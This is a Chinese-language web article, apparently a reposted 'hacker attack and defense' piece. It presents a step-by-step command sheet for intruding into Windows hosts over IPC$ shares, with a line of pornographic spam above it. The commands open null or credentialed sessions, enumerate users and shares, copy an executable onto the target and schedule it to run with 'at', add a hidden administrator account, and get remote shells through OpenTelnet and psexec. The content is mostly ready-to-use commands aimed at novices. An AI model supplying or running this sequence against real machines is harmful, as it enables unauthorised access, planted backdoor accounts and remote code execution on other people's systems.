自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

ipc$入侵中可能會(huì)用到的命令集結(jié)

安全 黑客攻防
本文列出了ipc$入侵中的一些常用命令,對(duì)于新手這無(wú)疑是份不錯(cuò)的資料,但是,如果你已經(jīng)掌握了這些命令,就當(dāng)做是在鞏固一下吧!

ipc$入侵命令是適用于本地還是遠(yuǎn)程,如果只適用于本地,你只能在獲得遠(yuǎn)程主機(jī)的shell(如cmd,telnet等)后,才能向遠(yuǎn)程主機(jī)執(zhí)行。

ipc$入侵命令1 建立/刪除ipc$連接的命令

1)建立空連接:

net use \\127.0.0.1\ipc$ "" /user:"" 

2)建立非空連接:

net use \\127.0.0.1\ipc$ "密碼" /user:"用戶(hù)名" 

3)刪除連接:

net use \\127.0.0.1\ipc$ /del

2 在ipc$連接中對(duì)遠(yuǎn)程主機(jī)的操作命令

1) 查看遠(yuǎn)程主機(jī)的共享資源(看不到默認(rèn)共享):

net view \\127.0.0.1 

2) 查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間:

net time \\127.0.0.1 

3) 得到遠(yuǎn)程主機(jī)的netbios用戶(hù)名列表:

nbtstat -A 127.0.0.1 

4)映射/刪除遠(yuǎn)程共享:

net use z: \\127.0.0.1\c 

此命令將共享名為c的共享資源映射為本地z盤(pán) 

net use z: /del 

刪除映射的z盤(pán),其他盤(pán)類(lèi)推

5)向遠(yuǎn)程主機(jī)復(fù)制文件:

copy 路徑\文件名 \\IP\共享目錄名,如:

copy c:\xinxin.exe \\127.0.0.1\c$ 即將c盤(pán)下的xinxin.exe復(fù)制到對(duì)方c盤(pán)內(nèi)

當(dāng)然,你也可以把遠(yuǎn)程主機(jī)上的文件復(fù)制到自己的機(jī)器里:

copy \\127.0.0.1\c$\xinxin.exe c:\

6)遠(yuǎn)程添加計(jì)劃任務(wù):

at \\IP 時(shí)間 程序名 如:

at \\127.0.0.0 11:00 xinxin.exe

注意:時(shí)間盡量使用24小時(shí)制;如果你打算運(yùn)行的程序在系統(tǒng)默認(rèn)搜索路徑(比如system32/)下則不用加路徑,否則必須加全路徑

ipc$入侵命令3 本地命令

1)查看本地主機(jī)的共享資源(可以看到本地的默認(rèn)共享)

net share

2)得到本地主機(jī)的用戶(hù)列表

net user

3)顯示本地某用戶(hù)的帳戶(hù)信息

net user 帳戶(hù)名

4)顯示本地主機(jī)當(dāng)前啟動(dòng)的服務(wù)

net start 

5)啟動(dòng)/關(guān)閉本地服務(wù)

net start 服務(wù)名 

net stop 服務(wù)名 

6)在本地添加帳戶(hù)

net user 帳戶(hù)名 密碼 /add

7)激活禁用的用戶(hù)

net uesr 帳戶(hù)名 /active:yes

8)加入管理員組

net localgroup administrators 帳戶(hù)名 /add 

很顯然的是,雖然這些都是本地命令,但如果你在遠(yuǎn)程主機(jī)的shell中輸入,比如你telnet成功后輸入上面這些命令,那么這些本地輸入將作用在遠(yuǎn)程主機(jī)上。

ipc$入侵命令4 其他一些命令

1)telnet 

telnet IP 端口

telnet 127.0.0.0 23

2)用opentelnet.exe開(kāi)啟遠(yuǎn)程主機(jī)的telnet

OpenTelnet.exe \\ip 管理員帳號(hào) 密碼 NTLM的認(rèn)證方式 port

OpenTelnet.exe \\127.0.0.1 administrator "" 1 90

不過(guò)這個(gè)小工具需要滿(mǎn)足四個(gè)要求:

1)目標(biāo)開(kāi)啟了ipc$共享

2)你要擁有管理員密碼和帳號(hào)

3)目標(biāo)開(kāi)啟RemoteRegistry服務(wù),用戶(hù)就可以更改ntlm認(rèn)證

4)對(duì)僅WIN2K/XP有效

3)用psexec.exe一步獲得shell,需要ipc管道支持

psexec.exe \\IP -u 管理員帳號(hào) -p 密碼 cmd

psexec.exe \\127.0.0.1 -u administrator -p "" cmd

ipc$入侵命令就為大家總結(jié)到這里,希望你能掌握。

責(zé)任編輯:佚名 來(lái)源: 網(wǎng)易
相關(guān)推薦

2021-06-06 16:52:11

工具函數(shù)JS

2011-08-16 14:58:45

Port Channe

2020-10-08 18:14:15

碼農(nóng)Git命令

2021-08-06 07:55:55

黑客工具網(wǎng)站臨時(shí)手機(jī)號(hào)

2013-06-04 11:22:01

Linux常用命令

2021-04-20 10:31:29

WhatsAppAndroid惡意軟件

2011-09-01 09:19:35

2009-01-04 17:41:07

2015-04-08 09:54:41

OpenStack資源私有云部署

2023-09-27 22:14:10

GIT 命令開(kāi)發(fā)

2019-03-22 08:00:01

Git命令GitHub

2020-07-06 07:48:16

MySQL細(xì)節(jié)SQL

2018-02-02 08:31:22

數(shù)據(jù)存儲(chǔ)分子

2021-03-01 11:53:13

Javascript數(shù)據(jù)類(lèi)型前端

2021-02-26 14:33:04

Javascript數(shù)據(jù)類(lèi)型前端

2015-04-22 09:50:56

程序員

2016-03-16 11:20:47

2021-12-29 22:29:10

JavaScript前端數(shù)組

2018-07-10 10:45:00

規(guī)范Commit項(xiàng)目
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)